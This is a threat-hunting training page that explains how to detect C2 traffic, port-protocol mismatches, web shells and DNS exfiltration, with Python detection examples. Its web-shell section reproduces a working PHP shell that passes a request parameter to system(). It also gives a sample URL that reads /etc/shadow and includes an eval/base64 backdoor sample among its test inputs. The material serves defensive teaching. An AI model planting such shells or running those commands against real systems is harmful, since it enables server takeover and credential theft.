# Hunting for irregular traffic

#### **Irregularities in network traffic are useful indicators for threat hunters**

Malware authors use a variety of techniques to hide C2 traffic

* Misused protocols
* Port-application mismatches

Attackers also scan for and use web shells as an initial infection vector

## Misused protocols

Common protocols are often misused for C2 since they are less likely to be detected and blocked

* Most organizations allow DNS, HTTP, etc across network boundaries

Identification of protocol misuse requires knowledge of where data can be hidden in these protocols

* DNS domains, HTTP header fields, etc

Detecting this type of C2 requires comparing traffic to the norm and investigating anomalies

* "Rinse and repeat" works for more than just DNS!
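The "compare to the norm" approach above, worked through for DNS as an added example (this is not code from the course page): a known-good period is used to learn what ordinary leftmost DNS labels look like (length and character entropy), and clients in the period under investigation whose queries sit well outside that norm are reported for investigation. All log lines, IP addresses and domain names are constructed for the example, and the `mean + 3*stdev` threshold is an assumption to tune against real baseline data.

```python
import math
import statistics
from collections import defaultdict

# Constructed sample data (not from the page). Each line: "<client_ip> <queried name>".
# BASELINE_LOG stands for a known-good period used to learn "normal"; CURRENT_LOG is
# the period being hunted.
BASELINE_LOG = """\
10.0.0.5 www.example.com
10.0.0.5 mail.example.com
10.0.0.5 cdn.example.net
10.0.0.7 api.example.org
10.0.0.7 login.example.net
10.0.0.7 static.example.org
10.0.0.8 www.example.org
10.0.0.8 img.example.net
10.0.0.8 docs.example.com
"""

CURRENT_LOG = """\
10.0.0.5 www.example.com
10.0.0.5 mail.example.com
10.0.0.5 api.example.org
10.0.0.7 login.example.net
10.0.0.7 static.example.org
10.0.0.7 cdn.example.net
10.0.0.9 www.example.com
10.0.0.9 4a6f686e20536d697468.x7.evil-example.test
10.0.0.9 6a7e3c0f9b12ad44ffe0.x7.evil-example.test
10.0.0.9 0d2b8c1e5f7a93c4be61.x7.evil-example.test
10.0.0.9 9f1e2d3c4b5a69788796.x7.evil-example.test
"""


def shannon_entropy(s):
    """Bits per character of s; high values suggest encoded or encrypted data."""
    if not s:
        return 0.0
    n = len(s)
    counts = {c: s.count(c) for c in set(s)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def label_features(qname):
    """Length and entropy of the leftmost label, the part a client controls most freely."""
    label = qname.rstrip(".").split(".")[0]
    return len(label), shannon_entropy(label)


def parse(log):
    return [tuple(line.split()) for line in log.splitlines() if line.strip()]


def learn_norm(baseline_log, k=3.0):
    """Per-feature threshold = mean + k*stdev over every baseline query (k is an assumption)."""
    lengths, entropies = [], []
    for _, qname in parse(baseline_log):
        length, ent = label_features(qname)
        lengths.append(length)
        entropies.append(ent)
    return {
        "len": statistics.mean(lengths) + k * statistics.pstdev(lengths),
        "ent": statistics.mean(entropies) + k * statistics.pstdev(entropies),
    }


def hunt(current_log, thresholds):
    """Return {client: (mean_len, mean_entropy)} for clients above either threshold."""
    per_client = defaultdict(list)
    for client, qname in parse(current_log):
        per_client[client].append(label_features(qname))
    flagged = {}
    for client, feats in per_client.items():
        mean_len = statistics.mean(f[0] for f in feats)
        mean_ent = statistics.mean(f[1] for f in feats)
        if mean_len > thresholds["len"] or mean_ent > thresholds["ent"]:
            flagged[client] = (round(mean_len, 2), round(mean_ent, 2))
    return flagged


if __name__ == "__main__":
    norm = learn_norm(BASELINE_LOG)
    for client, (length, ent) in hunt(CURRENT_LOG, norm).items():
        print(f"{client}: mean label length {length}, mean entropy {ent}; thresholds {norm}")
```

The same loop (learn the norm from a clean period, score the current period, investigate the outliers) is the "rinse and repeat" the text refers to; the features change per protocol (header field lengths for HTTP, label statistics for DNS), the procedure does not.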

## Port-application mismatches

Port numbers are in the range 0-65535

* 0-1023: System ports
* 1024-49151: User or registered ports
* 49152-65535: Dynamic or private ports

Malware authors may use common (HTTPS, DNS, etc) or custom protocols for C2

Malware may mix and match common/uncommon ports and common/custom protocols

* Common Protocol + Common Port
* Common Protocol + Uncommon Port
* Custom Protocol + Common Port
* Custom Protocol + Uncommon Port

Look at log data (firewall, proxy, webserver and application) to find anomalies
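The four protocol/port combinations listed above, applied to connection records as an added example (not code from the course page). The records imitate a firewall or Zeek-style connection log in which a DPI or "service" field names the protocol actually observed on the wire, so each connection can be sorted into one of the four quadrants and everything outside "common protocol on its common port" is listed, largest transfer first. The log lines, addresses and the `EXPECTED_PORTS` mapping are constructed assumptions for this example.

```python
import csv
import io
from collections import defaultdict

# Constructed connection records (not from the page). "service" is the protocol a DPI
# engine identified in the payload, independent of the destination port.
CONN_LOG = """\
ts,src,dst,dport,service,bytes
1,10.0.0.5,93.184.216.34,443,tls,5120
2,10.0.0.5,8.8.8.8,53,dns,300
3,10.0.0.7,198.51.100.20,80,http,2048
4,10.0.0.9,203.0.113.77,53,http,9000
5,10.0.0.9,203.0.113.77,443,unknown,40000
6,10.0.0.12,203.0.113.90,4444,http,1500
7,10.0.0.12,203.0.113.90,50001,unknown,80000
8,10.0.0.7,198.51.100.21,22,ssh,700
"""

# Ports on which each common protocol is normally expected (assumption for this example).
EXPECTED_PORTS = {
    "dns": {53},
    "http": {80, 8080},
    "tls": {443, 8443},
    "ssh": {22},
}
COMMON_PORTS = set().union(*EXPECTED_PORTS.values())

EXPECTED = "common protocol, common port"


def quadrant(dport, service):
    """Map one connection onto the four protocol/port combinations from the text."""
    if service in EXPECTED_PORTS:
        # Recognised protocol: is it on a port where we expect it?
        return EXPECTED if dport in EXPECTED_PORTS[service] else "common protocol, uncommon port"
    # Unrecognised payload: is it hiding behind a port that is normally allowed?
    return "custom protocol, common port" if dport in COMMON_PORTS else "custom protocol, uncommon port"


def classify(log_text):
    """Group connection records by quadrant."""
    buckets = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        buckets[quadrant(int(row["dport"]), row["service"].lower())].append(row)
    return buckets


def mismatches(log_text):
    """Every record outside the expected quadrant, most bytes transferred first."""
    rows = [r for q, rs in classify(log_text).items() if q != EXPECTED for r in rs]
    return sorted(rows, key=lambda r: int(r["bytes"]), reverse=True)


if __name__ == "__main__":
    for r in mismatches(CONN_LOG):
        q = quadrant(int(r["dport"]), r["service"].lower())
        print(f"{q:32} {r['src']} -> {r['dst']}:{r['dport']} ({r['bytes']} bytes)")
```

Sorting by bytes is a triage heuristic: a recognised protocol on an odd port moving a few kilobytes is usually a misconfigured service, while an unrecognised payload moving tens of megabytes through port 443 is the case worth opening first.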

## Web shells

Web shells are an undocumented way to gain console access to a computer through a dynamic server-side webpage

Traditionally, these web shells were simple and easy to detect

Sophisticated web shells include methods to interact with the console, edit file, etc.

* The C99 shell (almost a decade old) has several features:
  * SQL Manager
  * Visual File Manager (many features)
  * PHP Eval
  * Mail Bomber
  * Get all readable home directories

### Example

```php
<?php
// Classic single-file PHP web shell (the "simple backdoor" described in the text):
// there is no authentication, and the `cmd` request parameter is passed straight to system().
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
```

This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands:

* <http://comprimised-system.com/simple-backdoor.php?cmd=cat+/etc/shadow>

### Detecting unencrypted web shells

Shells such as C99 can be detected by using keyword searches or using a signature-based detection tool

The following statement (adapted from Steven Whitney) can be used to detect a PHP backdoor:

```bash
grep -RPn "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readfile|passthru)" /path/to/webdir/
```

This would generate a huge number of false positives, as many of these calls are used by legitimate web applications
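The keyword search above and its false-positive problem, worked through as an added example (not code from the course page or from Steven Whitney). `naive_hits` reproduces the grep statement as a regex over PHP sources and fires on any listed call, including the `fopen`/`fclose`/`mkdir` of an ordinary upload handler. `refined_verdict` narrows that to files where a command- or code-executing sink and request-derived input appear together, which is the property that actually makes the shell shown above a shell. The four PHP sources are constructed for the example; the first mirrors the shell in the text.

```python
import re

# Constructed PHP sources (not from the page); the first mirrors the simple shell above.
FILES = {
    "simple-backdoor.php": r'''<?php
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }
?>''',
    "upload.php": r'''<?php
$target = "/var/www/uploads/" . basename($_FILES["f"]["name"]);
$h = fopen($target, "w"); fwrite($h, file_get_contents($_FILES["f"]["tmp_name"])); fclose($h);
mkdir("/var/www/uploads/thumbs", 0755, true);
?>''',
    "obfuscated.php": r'''<?php
$k = $_POST["k"]; eval(base64_decode($k));
?>''',
    "report.php": r'''<?php
echo "<h1>Status</h1>"; phpinfo(INFO_GENERAL);
?>''',
}

# The keyword list from the grep statement above, restricted to call sites.
KEYWORDS = ("system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|"
            "fclose|readfile|passthru")
KEYWORD_RE = re.compile(rf"\b({KEYWORDS})\s*\(")

# Refinement (assumption for this example): sinks that execute commands or code,
# and superglobals that carry attacker-controlled request input.
EXEC_SINKS = re.compile(r"\b(system|passthru|shell_exec|exec|pcntl_exec|eval|assert)\s*\(")
REQUEST_SOURCES = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")


def naive_hits(src):
    """grep-style: every listed function call, regardless of context."""
    return sorted({m.group(1) for m in KEYWORD_RE.finditer(src)})


def refined_verdict(src):
    """Flag only when an exec sink and request-derived input occur in the same file."""
    return bool(EXEC_SINKS.search(src)) and bool(REQUEST_SOURCES.search(src))


def scan(files):
    """Return per-file keyword hits alongside the refined verdict."""
    return {name: {"keywords": naive_hits(src), "likely_shell": refined_verdict(src)}
            for name, src in files.items()}


if __name__ == "__main__":
    for name, result in scan(FILES).items():
        print(f"{name:22} keywords={result['keywords']} likely_shell={result['likely_shell']}")
```

The refined rule still reasons at file granularity and would miss input that reaches a sink through an include or a database, so it is a triage filter on top of the keyword search, not a replacement for reviewing the hits.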

### Detecting customized web shells

Some web shells, like the one generated with Weevely, have implemented mechanisms specifically aimed at avoiding signature detection

* Uses compression and encryption for obfuscation

Finding web shells on enterprise web servers can be difficult due to the sheer volume of data

Tools exist to help detect customized web shells:

* Part of threat hunting suites or vulnerability scanners (Nessus)
* Standalone tools (Webshell Scan, Scalp, NeoPI)

## Data exfiltration

Data exfiltration events are complex

Most involve transport nodes (not sources)

Overt and covert channels may be involved:

* IP multicasting
* Browser-based (e.g., DNS prefetching)
* Tunneling: DNS, HTTP, XXX
* Piggyback transporting (NTPv3, ICMP, etc)

**Data Loss Prevention (DLP)** solutions may miss exfiltration events:

* Exfiltration exploits are often stepping stones and do not always touch DLP-protected data
* Distributed exploitation networks are hard for DLP to detect

### Producer-Consumer Ratio (PCR)

One way to hunt for exfiltration is by detecting the shift in producer/consumer roles of a network node

#### **Producer-Consumer Ratio (PCR)**

* First introduced by Carter Bullard and John Gerth
* All nodes are producers and consumers of data
* The ratio of produced versus consumed data (PCR) is consistent

$$
PCR = \frac{SrcApplicationBytes - DstApplicationBytes}{SrcApplicationBytes + DstApplicationBytes}
$$

where *ApplicationBytes = (TotalBytes − Sum(L2, L3, L4 headers)) − RetransBytes*. PCR therefore ranges from −1 (pure consumer) to +1 (pure producer).

Example: DNS could be an exfiltration channel. An increase in PCR for DNS may be an indicator of exfiltration
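The PCR computation and the DNS example above, carried through on flow counters as an added example (not code from the course page or from Bullard and Gerth). Application bytes are derived per direction with the formula given in the text, PCR is computed per internal host for one service, and hosts whose DNS PCR has moved toward the producer end of the scale relative to a baseline period are reported. The flow records are constructed; "src" counters are taken to mean bytes sent by the internal host and "dst" bytes received by it, and the `min_delta` shift threshold is an assumption to tune on real data.

```python
# Constructed per-host, per-service flow counters (not from the page), seen from the
# internal host's side: bytes it sent (src_*) and received (dst_*), with L2-L4 header
# bytes and retransmitted bytes for each direction.
# Fields: host, service, src_total, src_hdr, src_retrans, dst_total, dst_hdr, dst_retrans
BASELINE_FLOWS = [
    ("10.0.0.5", "dns", 4200, 2500, 0, 9800, 2500, 0),
    ("10.0.0.7", "dns", 3900, 2300, 0, 9100, 2300, 0),
    ("10.0.0.9", "dns", 4500, 2700, 0, 10200, 2700, 0),
]
CURRENT_FLOWS = [
    ("10.0.0.5", "dns", 4300, 2600, 0, 9900, 2600, 0),
    ("10.0.0.7", "dns", 4000, 2400, 0, 9300, 2400, 0),
    # One host now sends far more DNS payload than it receives.
    ("10.0.0.9", "dns", 1_200_000, 90_000, 2_000, 95_000, 90_000, 0),
]


def application_bytes(total, headers, retrans):
    """ApplicationBytes = (TotalBytes - Sum(L2, L3, L4 headers)) - RetransBytes."""
    return (total - headers) - retrans


def pcr(src_app, dst_app):
    """Producer-Consumer Ratio in [-1, 1]: +1 pure producer, -1 pure consumer."""
    denom = src_app + dst_app
    return 0.0 if denom == 0 else (src_app - dst_app) / denom


def pcr_by_host(flows, service):
    """PCR per host for one service (e.g. "dns")."""
    result = {}
    for host, svc, st, sh, sr, dt, dh, dr in flows:
        if svc != service:
            continue
        result[host] = pcr(application_bytes(st, sh, sr), application_bytes(dt, dh, dr))
    return result


def pcr_shift(baseline, current, service, min_delta=0.5):
    """Hosts whose PCR for `service` rose by at least min_delta against the baseline.

    Returns {host: (baseline_pcr, current_pcr)}; hosts absent from the baseline are
    compared against 0.0 (neutral), an assumption for this example.
    """
    base = pcr_by_host(baseline, service)
    now = pcr_by_host(current, service)
    return {h: (round(base.get(h, 0.0), 3), round(v, 3))
            for h, v in now.items() if v - base.get(h, 0.0) >= min_delta}


if __name__ == "__main__":
    for host, (before, after) in pcr_shift(BASELINE_FLOWS, CURRENT_FLOWS, "dns").items():
        print(f"{host}: DNS PCR {before} -> {after}")
```

A normal DNS client sits on the consumer side (short queries, longer answers), so a host whose DNS PCR approaches +1 has inverted its role for that protocol, which is exactly the shift the text points to as an exfiltration indicator.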

## Additional resources

The following resources on the Skills portal show some network-based threat hunting tools and analysis methods

#### Cyber threat hunting

* Cyber-threat hunting - Hunting network-based threats
* Cyber-threat hunting - Finding threats in .pcap files
* Cyber-threat hunting - Detecting a port scan

#### Network traffic analysis
